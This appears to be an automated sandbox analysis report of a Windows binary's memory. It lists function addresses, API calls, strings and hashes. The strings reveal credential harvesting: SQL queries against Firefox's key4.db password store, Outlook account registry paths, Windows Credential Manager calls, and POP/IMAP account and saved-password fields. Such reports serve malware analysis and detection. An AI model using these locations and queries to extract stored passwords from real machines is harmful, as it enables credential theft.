Opcode Fuzzy Hash: c02a7e1620c193d28ef0090c9082c06cedc2e31f21f04b75fd3f2edb00844c96
Instruction Fuzzy Hash: A6112B7190025476F73127169C06FDB3E5CDF86B96F00407BBB08B61D3C6B94D40866D

Uniqueness

Uniqueness Score: -1.00%

Function 004106AD, Relevance: 19.3, APIs: 1, Strings: 10, Instructions: 50COMMON

Download Yara Rule

APIs

_mbscpy.MSVCRT ref: 00410720

Strings

Common Startup, xrefs: 00410713
Common Start Menu, xrefs: 004106ED
Common Desktop, xrefs: 0041070C
Programs, xrefs: 004106E6
Common Programs, xrefs: 0041071A
Desktop, xrefs: 004106CA
AppData, xrefs: 00410705
Start Menu, xrefs: 004106D1
Startup, xrefs: 004106D8
Favorites, xrefs: 004106DF

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: _mbscpy
String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
API String ID: 714388716-318151290
Opcode ID: 0a525b84c5f9161c47f62fe334daf8b9de5718508579850184da69b323b5bb64
Instruction ID: 9896847eb90bf5c4294a3c9dccddd80cbc36a64f1d49de08ffe9e6d9729d10b2
Opcode Fuzzy Hash: 0a525b84c5f9161c47f62fe334daf8b9de5718508579850184da69b323b5bb64
Instruction Fuzzy Hash: 5CF054B1BA870D60343C0528088EAF715009463B453764627F222E05DECEEDBCD26C0F

Uniqueness

Uniqueness Score: -1.00%

Function 0040C750, Relevance: 18.1, APIs: 12, Instructions: 142windowCOMMON

Download Yara Rule

APIs

SetBkMode.GDI32(?,00000001), ref: 0040C7C9
SetTextColor.GDI32(?,00FF0000), ref: 0040C7D7
SelectObject.GDI32(?,?), ref: 0040C7EC
DrawTextExA.USER32(?,?,000000FF,?,00000004,?), ref: 0040C821
SelectObject.GDI32(00000014,?), ref: 0040C82D

Part of subcall function 0040C586: GetCursorPos.USER32(?), ref: 0040C593
Part of subcall function 0040C586: GetSubMenu.USER32(?,00000000), ref: 0040C5A1
Part of subcall function 0040C586: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040C5CE

LoadCursorA.USER32(00000067), ref: 0040C84E
SetCursor.USER32(00000000), ref: 0040C855
PostMessageA.USER32(?,0000041C,00000000,00000000), ref: 0040C877
SetFocus.USER32(?), ref: 0040C8B2
SetFocus.USER32(?), ref: 0040C92B

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: Cursor$FocusMenuObjectSelectText$ColorDrawLoadMessageModePopupPostTrack
String ID:
API String ID: 1416211542-0
Opcode ID: 72d4e56ce9792ca9f6f5468ccb6de1f9c3d453dee6bcce5964bd40597cc99410
Instruction ID: 09ccc7060a79f4adaf8e2edad657e89b5ff3622033c15eab8e38028839dfd0e9
Opcode Fuzzy Hash: 72d4e56ce9792ca9f6f5468ccb6de1f9c3d453dee6bcce5964bd40597cc99410
Instruction Fuzzy Hash: 4E518276200605EFCB15AF64CCC5AAA77A5FB08302F004636F616B72A1CB39A951DB9D

Uniqueness

Uniqueness Score: -1.00%

Function 0040DEF0, Relevance: 18.1, APIs: 8, Strings: 4, Instructions: 129COMMON

Download Yara Rule

APIs

_strnicmp.MSVCRT ref: 0040DF1F
_strnicmp.MSVCRT ref: 0040DF44
memset.MSVCRT ref: 0040DF8D
memset.MSVCRT ref: 0040DFA3
sprintf.MSVCRT ref: 0040DFC2
sprintf.MSVCRT ref: 0040DFE1
_strcmpi.MSVCRT ref: 0040E000
_strcmpi.MSVCRT ref: 0040E022

Part of subcall function 004012EE: strlen.MSVCRT ref: 004012FB

Strings

mailbox://, xrefs: 0040DF19
mailbox://%s@%s, xrefs: 0040DFBC
imap://%s@%s, xrefs: 0040DFDB
imap://, xrefs: 0040DF3E

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: _strcmpi_strnicmpmemsetsprintf$strlen
String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
API String ID: 2360744853-2229823034
Opcode ID: a6af0bad8716113a6c9bfd3cc5ea0d59f472fdd556f841286d46f38d0b8e9215
Instruction ID: 5d143ff0da15214bab7bb06cf5d8f907292877c2fd7590e182fa264530f008e8
Opcode Fuzzy Hash: a6af0bad8716113a6c9bfd3cc5ea0d59f472fdd556f841286d46f38d0b8e9215
Instruction Fuzzy Hash: 934185726053059FE724DEA5C881F9673E8EF04304F10497BF64AE3281DB78F9588B59

Uniqueness

Uniqueness Score: -1.00%

Function 00402C4F, Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 104registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00410411: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,004107BA,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410424

memset.MSVCRT ref: 00402C8F

Part of subcall function 004104D7: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 004104FA

RegCloseKey.ADVAPI32(?), ref: 00402D91

Part of subcall function 00410493: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 004104CC

memset.MSVCRT ref: 00402CE9
sprintf.MSVCRT ref: 00402D02
sprintf.MSVCRT ref: 00402D40

Part of subcall function 00402BC3: memset.MSVCRT ref: 00402BE3
Part of subcall function 00402BC3: RegCloseKey.ADVAPI32 ref: 00402C47

Strings

Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00402CEE
%s\%s, xrefs: 00402CB1, 00402D00, 00402D3E
Identities, xrefs: 00402C5D
Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00402D2C
Username, xrefs: 00402CC2

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: Closememset$sprintf$EnumOpen
String ID: %s\%s$Identities$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Username
API String ID: 1831126014-3814494228
Opcode ID: f46643224f8d57702947c65e27ebef8c1ed422b4ee47cea5c2b02c2e50f71c0e
Instruction ID: 1b5601e0499ef747dd56af052f35eddfd4da5329eef37c5f4f36e35d9cf9c12c
Opcode Fuzzy Hash: f46643224f8d57702947c65e27ebef8c1ed422b4ee47cea5c2b02c2e50f71c0e
Instruction Fuzzy Hash: 0831507290011CBAEF11EA91CC46FEF777CAF04305F0404BABA04B2192E7B59F948B64

Uniqueness

Uniqueness Score: -1.00%

Function 0040FA44, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 81stringCOMMON

Download Yara Rule

APIs

strchr.MSVCRT ref: 0040FA5C
_mbscpy.MSVCRT ref: 0040FA6A

Part of subcall function 004075CB: strlen.MSVCRT ref: 004075DD
Part of subcall function 004075CB: strlen.MSVCRT ref: 004075E5
Part of subcall function 004075CB: _memicmp.MSVCRT ref: 00407603

_mbscpy.MSVCRT ref: 0040FABA
_mbscat.MSVCRT ref: 0040FAC5
memset.MSVCRT ref: 0040FAA1

Part of subcall function 00406EF9: GetWindowsDirectoryA.KERNEL32(004517B0,00000104,?,0040FAFA,00000000,?,00000000,00000104,00000104), ref: 00406F0E
Part of subcall function 00406EF9: _mbscpy.MSVCRT ref: 00406F1E

memset.MSVCRT ref: 0040FAE9
memcpy.MSVCRT ref: 0040FB04
_mbscat.MSVCRT ref: 0040FB0F

Strings

\systemroot, xrefs: 0040FA77

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
String ID: \systemroot
API String ID: 912701516-1821301763
Opcode ID: 6ed46392c19141da617902d7b5570fa245ae562c0294e1b5c940c35c61e6b91f
Instruction ID: 2dd3a797b17f22995e4c1cf65abf5f7fbb47152c003677c6e5f404f17f2ef451
Opcode Fuzzy Hash: 6ed46392c19141da617902d7b5570fa245ae562c0294e1b5c940c35c61e6b91f
Instruction Fuzzy Hash: 92210A7550C20469F734E2618C82FEB76EC9B55708F10007FF289E14C1EEBCA9884A6A

Uniqueness

Uniqueness Score: -1.00%

Function 00406625, Relevance: 16.7, APIs: 7, Strings: 4, Instructions: 205COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00406650

Part of subcall function 00406CA4: strlen.MSVCRT ref: 00406CA9
Part of subcall function 00406CA4: memcpy.MSVCRT ref: 00406CBE

memcpy.MSVCRT ref: 00406719
memcpy.MSVCRT ref: 00406731
memcpy.MSVCRT ref: 0040674A
memcmp.MSVCRT ref: 004067EB
memcpy.MSVCRT ref: 0040680F
memcpy.MSVCRT ref: 00406827

Strings

SELECT item1,item2 FROM metadata WHERE id = 'password', xrefs: 0040668D
C@, xrefs: 00406625
SELECT a11,a102 FROM nssPrivate, xrefs: 0040677A
key4.db, xrefs: 00406632

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: memcpy$memcmpmemsetstrlen
String ID: C@$SELECT a11,a102 FROM nssPrivate$SELECT item1,item2 FROM metadata WHERE id = 'password'$key4.db
API String ID: 2950547843-1835927508
Opcode ID: 29e67128f806e27f32a5a844b83660c965dc1796d59f1ea4f69cdb33fe82b5c1
Instruction ID: 4af0f314ee18ccde9e1bafe1ac3c0a9422d02a762a4adf5b984e4b61dd213191
Opcode Fuzzy Hash: 29e67128f806e27f32a5a844b83660c965dc1796d59f1ea4f69cdb33fe82b5c1
Instruction Fuzzy Hash: A961CA72A00218AFDB10EF75DC81BAE73A8AF04318F12457BF915E7281D678EE548799

Uniqueness

Uniqueness Score: -1.00%

Function 00406B9A, Relevance: 16.6, APIs: 11, Instructions: 58clipboardmemoryfileCOMMON

Download Yara Rule

APIs

EmptyClipboard.USER32 ref: 00406BA4

Part of subcall function 00406A9F: CreateFileA.KERNEL32(R7D,80000000,00000001,00000000,00000003,00000000,00000000,0044368E,?,.8D,00443752,?,?,*.oeaccount,.8D,?), ref: 00406AB1

GetFileSize.KERNEL32(00000000,00000000), ref: 00406BC1
GlobalAlloc.KERNEL32(00002000,00000001), ref: 00406BD2
GlobalFix.KERNEL32(00000000), ref: 00406BDF
ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BF2
GlobalUnWire.KERNEL32(00000000), ref: 00406C01
SetClipboardData.USER32(00000001,00000000), ref: 00406C0A
GetLastError.KERNEL32 ref: 00406C12
CloseHandle.KERNEL32(?), ref: 00406C1E
GetLastError.KERNEL32 ref: 00406C29
CloseClipboard.USER32 ref: 00406C32

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleReadSizeWire
String ID:
API String ID: 2565263379-0
Opcode ID: 1b6e565173029c6444be00b6b2d36f782b825a097f2130a1a97e673a6d3a71af
Instruction ID: 428d7c431cb1422a1915013c6704b220f4cf118cce9454ff27e0024ace88079b
Opcode Fuzzy Hash: 1b6e565173029c6444be00b6b2d36f782b825a097f2130a1a97e673a6d3a71af
Instruction Fuzzy Hash: E2114239904605FFEF105FA4DC4CB9E7FB8EB46755F104035F542E1192DB7489508A69

Uniqueness

Uniqueness Score: -1.00%

Function 00408C8C, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowstringCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(?), ref: 00408CA2
memset.MSVCRT ref: 00408CC6
GetMenuItemInfoA.USER32(?), ref: 00408CFC
memset.MSVCRT ref: 00408D29
strchr.MSVCRT ref: 00408D35
_mbscat.MSVCRT ref: 00408D90
ModifyMenuA.USER32(?,?,00000400,?,?), ref: 00408DAC

Strings

6, xrefs: 00408CEC
0, xrefs: 00408CE1

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: Menu$Itemmemset$CountInfoModify_mbscatstrchr
String ID: 0$6
API String ID: 3540791495-3849865405
Opcode ID: 9736ca1d0936a6b325f5f26c76bf6a16feb47f6dda5c5e610d37bbbd056a36f8
Instruction ID: 3c8b7fd7a28504c7ca875bf426ab9eeebffe21bfd5384a9a2131e9ee4f2c6c2c
Opcode Fuzzy Hash: 9736ca1d0936a6b325f5f26c76bf6a16feb47f6dda5c5e610d37bbbd056a36f8
Instruction Fuzzy Hash: CB31AD72408384AFD7209F91D940A9BBBE9EF84354F04493FFAC4A2291D778D9548F6A

Uniqueness

Uniqueness Score: -1.00%

Function 00418FCA, Relevance: 15.3, APIs: 6, Strings: 4, Instructions: 319COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00419165
memcpy.MSVCRT ref: 00419184
memcpy.MSVCRT ref: 00419196
memcpy.MSVCRT ref: 004191AE
memcpy.MSVCRT ref: 004191CB
memcpy.MSVCRT ref: 004191E3

Strings

-journal, xrefs: 004191A8
-wal, xrefs: 004191DD
immutable, xrefs: 00419294
nolock, xrefs: 0041927B

Memory Dump Source

Source File: 00000017.00000001.609694889.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000001.610162970.000000000044F000.00000040.00020000.sdmp Download File
Associated: 00000017.00000001.610182009.0000000000452000.00000040.00020000.sdmp Download File

Similarity

API ID: memcpy
String ID: -journal$-wal$immutable$nolock
API String ID: 3510742995-3408036318
Opcode ID: ed487462f499e22c287cd58e453203dadf3df8af69fac5cd2e1427472e1cf0ad
Instruction ID: 01a3cfc3161f2179d827f175e8c33b529befff994fa447307002f7c0b3a07cf5
Opcode Fuzzy Hash: ed487462f499e22c287cd58e453203dadf3df8af69fac5cd2e1427472e1cf0ad
Instruction Fuzzy Hash: C7C1F372A04606AFDB14DFA9C841BDEFFB0BF44314F14825EE428E7281D778A994CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00409989, Relevance: 15.2, APIs: 7, Strings: 3, Instructions: 157COMMON

Download Yara Rule

APIs

Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097AB
Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097B9
Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097CA
Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097E1
Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097EA

??2@YAPAXI@Z.MSVCRT ref: 004099C0
??2@YAPAXI@Z.MSVCRT ref: 004099DC
memcpy.MSVCRT ref: 00409A04
memcpy.MSVCRT ref: 00409A21
??2@YAPAXI@Z.MSVCRT ref: 00409AAA
??2@YAPAXI@Z.MSVCRT ref: 00409AB4
??2@YAPAXI@Z.MSVCRT ref: 00409AEC

Part of subcall function 00408B27: LoadStringA.USER32(00000000,0000000D,?,?), ref: 00408BF0
Part of subcall function 00408B27: memcpy.MSVCRT ref: 00408C2F

Part of subcall function 00408B27: _mbscpy.MSVCRT ref: 00408BA2
Part of subcall function 00408B27: strlen.MSVCRT ref: 00408BC0

Strings

Mxt, xrefs: 00409A85, 00409B0F, 00409ACB
$, xrefs: 00409A74
Mxt, xrefs: 00409A55

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: ??2@??3@$memcpy$LoadString_mbscpystrlen
String ID: $$Mxt$Mxt
API String ID: 2915808112-2074666769
Opcode ID: 75ce2435382999355ee7df4bce0b38d23defbf10d882b0e19774d56c0a5fb620
Instruction ID: c499689f9fa1b304e99f77f7c015d52b7a22264b22564a6ed79451bf6b5d1632
Opcode Fuzzy Hash: 75ce2435382999355ee7df4bce0b38d23defbf10d882b0e19774d56c0a5fb620
Instruction Fuzzy Hash: A6513B71601704AFD724DF69C582B9AB7F4BF48354F10892EE65ADB282EB74A940CF44

Uniqueness

Uniqueness Score: -1.00%

Function 004019E9, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 195stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 004019F5
abs.MSVCRT ref: 00401AF5
abs.MSVCRT ref: 00401B2C
log.MSVCRT ref: 00401BDB
log.MSVCRT ref: 00401BED
??3@YAXPAX@Z.MSVCRT ref: 00401C0E
??3@YAXPAX@Z.MSVCRT ref: 00401C22

Strings

, xrefs: 00401A23

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: ??3@$strlen
String ID:
API String ID: 4288758904-3916222277
Opcode ID: de41c446573b448f2559c76c21c5fcda8dfd136ac2dbf7f7621294d11401d03f
Instruction ID: 24b34d1c19d378cbc4a311a34392409bda21909db6314ed607bd163125115c99
Opcode Fuzzy Hash: de41c446573b448f2559c76c21c5fcda8dfd136ac2dbf7f7621294d11401d03f
Instruction Fuzzy Hash: 6A61873440D782DFDB609F25948006BBBF0FB89315F54593FF5D2A22A1D739984ACB0A

Uniqueness

Uniqueness Score: -1.00%

Function 00408458, Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 152COMMON

Download Yara Rule

APIs

Part of subcall function 004045D6: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F07D,?,00000000), ref: 004045E3
Part of subcall function 004045D6: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 004045FC
Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredFree), ref: 00404608
Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404614
Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404620
Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 0040462C

wcslen.MSVCRT ref: 004084C2
_wcsncoll.MSVCRT ref: 00408506
memset.MSVCRT ref: 0040859A
memcpy.MSVCRT ref: 004085BE
wcschr.MSVCRT ref: 00408612
LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 0040863C

Part of subcall function 00404780: FreeLibrary.KERNELBASE(?,?), ref: 00404795

Strings

Microsoft_WinInet, xrefs: 004084B6
J, xrefs: 00408540

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: AddressProc$FreeLibrary$LoadLocal_wcsncollmemcpymemsetwcschrwcslen
String ID: J$Microsoft_WinInet
API String ID: 1371990430-260894208
Opcode ID: 077bc0f962b90c4b7348f0cf44737b794f9e944ea76e4abc7dc2194eab39edf9
Instruction ID: daadb017bf7cdd7d7f2103bea61dec75ef30dccaf082131e005dcc9144427660
Opcode Fuzzy Hash: 077bc0f962b90c4b7348f0cf44737b794f9e944ea76e4abc7dc2194eab39edf9
Instruction Fuzzy Hash: D55115B1508346AFD720DF65C980A5BB7E8FF89304F00492EF998D3251EB39E918CB56

Uniqueness

Uniqueness Score: -1.00%

Function 0041025A, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 64COMMON

Download Yara Rule

APIs

UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410277
UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 0041028B
UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410298
memcpy.MSVCRT ref: 004102D6

Strings

220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0041027F
417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 00410293
220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 00410272
220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 00410286

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: FromStringUuid$memcpy
String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
API String ID: 2859077140-2022683286
Opcode ID: 8ab31fcad472c8e0f7fc1e7956a4c0916ede4aff3821f8ba5262597d6c198381
Instruction ID: e4eb6b96217285778323d40e2be480743d786dbe6d4556737564963462aa5f63
Opcode Fuzzy Hash: 8ab31fcad472c8e0f7fc1e7956a4c0916ede4aff3821f8ba5262597d6c198381
Instruction Fuzzy Hash: CC116D7290012EABDF11DEA4DC85EEB37ACEB49354F050423FD41E7201E6B8DD848BA6

Uniqueness

Uniqueness Score: -1.00%

Function 00406A1A, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarystringwindowCOMMON

Download Yara Rule

APIs

LoadLibraryExA.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,00406B39,?,?), ref: 00406A3F
FormatMessageA.KERNEL32(00001100,00000000,00000000,00000400,?,00000000,00000000,?,00000000,?,?,00406B39,?,?), ref: 00406A5D
strlen.MSVCRT ref: 00406A6A
_mbscpy.MSVCRT ref: 00406A7A
LocalFree.KERNEL32(?,?,?,00406B39,?,?), ref: 00406A84
_mbscpy.MSVCRT ref: 00406A94

Strings

netmsg.dll, xrefs: 00406A3A
Unknown Error, xrefs: 00406A8C

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: _mbscpy$FormatFreeLibraryLoadLocalMessagestrlen
String ID: Unknown Error$netmsg.dll
API String ID: 2881943006-572158859
Opcode ID: 6f52f5a2d9a4709df10b96865aeabca7128dc0176ffe7e1710966274240e0752
Instruction ID: d85fce99d4424776e4d89386e5c8d6134dfcbe96067fcf7c7fc9c3f577b26335
Opcode Fuzzy Hash: 6f52f5a2d9a4709df10b96865aeabca7128dc0176ffe7e1710966274240e0752
Instruction Fuzzy Hash: 0801F7316001147FEB147B51EC46F9F7E28EB06791F21407AFA06F0091DA795E209AAC

Uniqueness

Uniqueness Score: -1.00%

Function 00404A94, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 52libraryloaderwindowCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(comctl32.dll,74784DE0,?,00000000,?,?,?,0040CC82,74784DE0), ref: 00404AB3
GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404AC5
FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040CC82,74784DE0), ref: 00404AD9
MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B04

Strings

Error: Cannot load the common control classes., xrefs: 00404AFE
Error, xrefs: 00404AF9
comctl32.dll, xrefs: 00404A9C
InitCommonControlsEx, xrefs: 00404ABF

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: Library$AddressFreeLoadMessageProc
String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
API String ID: 2780580303-317687271
Opcode ID: 0605f619fc244978403acb2e7e50909fcfc2fbf3368997ac03ccd37e60a8c8f1
Instruction ID: 36f372293bcd99ea712e996d8bb82ea6b99e6deebf99936071b003413e9982ca
Opcode Fuzzy Hash: 0605f619fc244978403acb2e7e50909fcfc2fbf3368997ac03ccd37e60a8c8f1
Instruction Fuzzy Hash: 860149797516103BEB115BB19C49F7FBAACDB8674AF010035F602F2182DEBCC9018A5D

Uniqueness

Uniqueness Score: -1.00%

Function 004093DD, Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON

Download Yara Rule

APIs

Part of subcall function 00406D1F: GetFileAttributesA.KERNELBASE(?,004093E6,?,0040949C,00000000,?,00000000,00000104,?), ref: 00406D23

_mbscpy.MSVCRT ref: 004093F7
_mbscpy.MSVCRT ref: 00409407
GetPrivateProfileIntA.KERNEL32(00451308,rtl,00000000,00451200), ref: 00409418

Part of subcall function 00408FE9: GetPrivateProfileStringA.KERNEL32(00451308,?,0044551F,00451358,?,00451200), ref: 00409004

Strings

charset, xrefs: 00409426
general, xrefs: 004093FC
TranslatorURL, xrefs: 00409450
TranslatorName, xrefs: 0040943C
rtl, xrefs: 00409412

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: PrivateProfile_mbscpy$AttributesFileString
String ID: TranslatorName$TranslatorURL$charset$general$rtl
API String ID: 888011440-2039793938
Opcode ID: 24ae1597cccf157e84aceca8fe92e39611a3c2f2b7ab4c482bf00d98a5b7e0b9
Instruction ID: 0b3e14b162d046b550c41b249f06feb679facb3af2f7b05e7ff0b413a15a09bb
Opcode Fuzzy Hash: 24ae1597cccf157e84aceca8fe92e39611a3c2f2b7ab4c482bf00d98a5b7e0b9
Instruction Fuzzy Hash: C6F09621F8435136FB203B325C03F2E29488BD2F56F1640BFBD08B65D3DAAD8811559E

Uniqueness

Uniqueness Score: -1.00%

Function 0042DF2E, Relevance: 13.8, APIs: 2, Strings: 7, Instructions: 272COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 0042E006
memset.MSVCRT ref: 0042E045

Strings

database %s is already in use, xrefs: 0042E014
cannot ATTACH database within transaction, xrefs: 0042DFAC
database is already attached, xrefs: 0042E0DD
attached databases must use the same text encoding as main database, xrefs: 0042E12C
too many attached databases - max %d, xrefs: 0042DF97
unable to open database: %s, xrefs: 0042E21C
out of memory, xrefs: 0042E235

Memory Dump Source

Source File: 00000017.00000001.609694889.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000001.610162970.000000000044F000.00000040.00020000.sdmp Download File
Associated: 00000017.00000001.610182009.0000000000452000.00000040.00020000.sdmp Download File

Similarity

API ID: memcpymemset
String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
API String ID: 1297977491-2001300268
Opcode ID: ff6fc87711034770d1fb0c6f2eb3d9796d7433f6f4f610f2bf4051590f3c2342
Instruction ID: c7e7a29d1825d2e945301ab40bb758a3ed070f64a4837571caa387bbb47581b8
Opcode Fuzzy Hash: ff6fc87711034770d1fb0c6f2eb3d9796d7433f6f4f610f2bf4051590f3c2342
Instruction Fuzzy Hash: BFA1BC70608311DFD720DF2AE441A6BBBE4BF88318F54492FF48987252D778E945CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00403158, Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 100stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0040312A: GetPrivateProfileStringA.KERNEL32(00000000,?,0044551F,?,?,?), ref: 0040314E

strchr.MSVCRT ref: 0040326D

Strings

PopServer, xrefs: 004031BA
RealName, xrefs: 004031EC
PopAccount, xrefs: 00403258
1, xrefs: 0040319B
LoginName, xrefs: 004031D6
ReturnAddress, xrefs: 00403205
SavePasswordText, xrefs: 0040321D
UsesIMAP, xrefs: 0040317A
